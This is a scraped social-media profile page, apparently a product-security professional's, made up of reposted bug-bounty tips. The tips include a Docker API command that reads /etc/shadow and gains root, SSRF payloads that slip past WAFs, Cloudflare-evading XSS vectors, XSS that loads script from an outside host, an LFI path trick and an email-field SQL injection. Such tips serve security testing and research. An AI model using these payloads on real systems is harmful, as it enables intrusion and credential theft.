TurbanatorSJS's profile picture. Product Security @ Salesforce

Simran J. Singh

@TurbanatorSJS

Product Security @ Salesforce

Simran J. Singh reposted

💥Easy RCE using Docker API on port 2375/tcp docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/shadow RCE: chroot /mnt #ptswarmTechniques

ptswarm's tweet image. 💥Easy RCE using Docker API on port 2375/tcp

docker -H &amp;lt;host&amp;gt;:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
RCE: chroot /mnt

#ptswarmTechniques

Simran J. Singh reposted

Full Disclosure for the community ♥️ One of the best bugs we have received in a while, good quality report on HTTP Smuggling attack by @defparam hackerone.com/reports/771666 #bugbounty


Simran J. Singh reposted

SQL Injection in Email Address (username) - by @dimazarno Tips: "injection_here"[at]email[dot]com Bypassing Email Filter which leads to SQL Injection: medium.com/@dimazarno/byp…

YoKoAcc's tweet image. SQL Injection in Email Address (username) - by @dimazarno

Tips: &quot;injection_here&quot;[at]email[dot]com

Bypassing Email Filter which leads to SQL Injection:

medium.com/@dimazarno/byp…
YoKoAcc's tweet image. SQL Injection in Email Address (username) - by @dimazarno

Tips: &quot;injection_here&quot;[at]email[dot]com

Bypassing Email Filter which leads to SQL Injection:

medium.com/@dimazarno/byp…
YoKoAcc's tweet image. SQL Injection in Email Address (username) - by @dimazarno

Tips: &quot;injection_here&quot;[at]email[dot]com

Bypassing Email Filter which leads to SQL Injection:

medium.com/@dimazarno/byp…

Simran J. Singh reposted

Keywords to extract information from APK - grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/ #mobilesecurity #infosec #bugbountytips

AmitMDubey's tweet image. Keywords to extract information from APK -

grep -EHirn &quot;accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into&quot; APKfolder/

#mobilesecurity #infosec  #bugbountytips

Simran J. Singh reposted

Easy P3/P4. Bug- Unrestricted Google Maps API Keys: A. For web view the source code and find MAPS_API_KEY. B. For Android: 1. Decompile Android apk. 2. Navigate to Androidmanifest.xml or Res->Values->Strings.xml To check Vulnerable API Use: github.com/ozguralp/gmaps…


Simran J. Singh reposted

Simran J. Singh reposted

SSRF's to bypass WAF http://⑯⑨。②⑤④。⑯⑨。②⑤④/ http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/ http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/ http://②⑧⑤②⓪③⑨①⑥⑥:80/ http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/ http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥


Simran J. Singh reposted

There's also another way to trigger android apps functionality using android-app schema, android-app://<package-name>/<link> POC: To trigger the chrome app, you can use it as android-app://com.google.com/https://kunal123.com href in another browser, it'll work. (1/2)


Simran J. Singh reposted

Bug of the Week! XSS in GMail’s #amp4email implementation via DOM Clobbering by @SecurityMB: research.securitum.com/xss-in-amp4ema…


Simran J. Singh reposted

We've updated the XSS cheat sheet with some new vectors from the community and @garethheyes. There are some new sections and buttons to copy tags, events and payloads. portswigger.net/web-security/c…


Simran J. Singh reposted

My first bounty blog post Get the full content of the private project internal network via ssrf jin0ne.blogspot.com/2019/11/bugbou… Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip


Simran J. Singh reposted

Here is an interesting find and the root cause analysis of an Arbitrary file read vulnerability discovered by me in @PhantomJS darkmatter.ae/blogs/breachin… Note to Devs, never download user controllable HTML locally for converting it in to PDF or PNG if you are using PhantomJs.


Simran J. Singh reposted

You found an LFI but can't disclose all source code due to a different Webroot path Use /proc/self/cwd/ which points to the current directory. (>‿◠)✌ @TnMch_ Exp: /?page=/proc/self/cwd/index.php #bugbounty #bugbountytips


Simran J. Singh reposted

Confused by DNS Records? A, CNAME, ALIAS... Me too 😬 Let's change that! (cheatsheet at the end) 🔥 DNS Record crash course for web developers 👇


Simran J. Singh reposted

cloudflare `XSS´ success, red dot. 🎃 « <svg onload\r\n=$.globalEval("al"+"ert()");> » « <svg/onload=self[`aler`%2b`t`]`1`> » #BugBounty #BugBountyTip #WAF #infosec


Simran J. Singh reposted

Django JSONField SQL Injection(CVE-2019-14234), which can be reproduced in the django-admin by default.

phithon_xg's tweet image. Django JSONField SQL Injection(CVE-2019-14234), which can be reproduced in the django-admin by default.

Simran J. Singh reposted

Load external javascript in script: import('url') For example: <img src onerror=import('//bo0om.ru/x/')> Works in Chrome #XSS #javascript


Loading...

Something went wrong.


Something went wrong.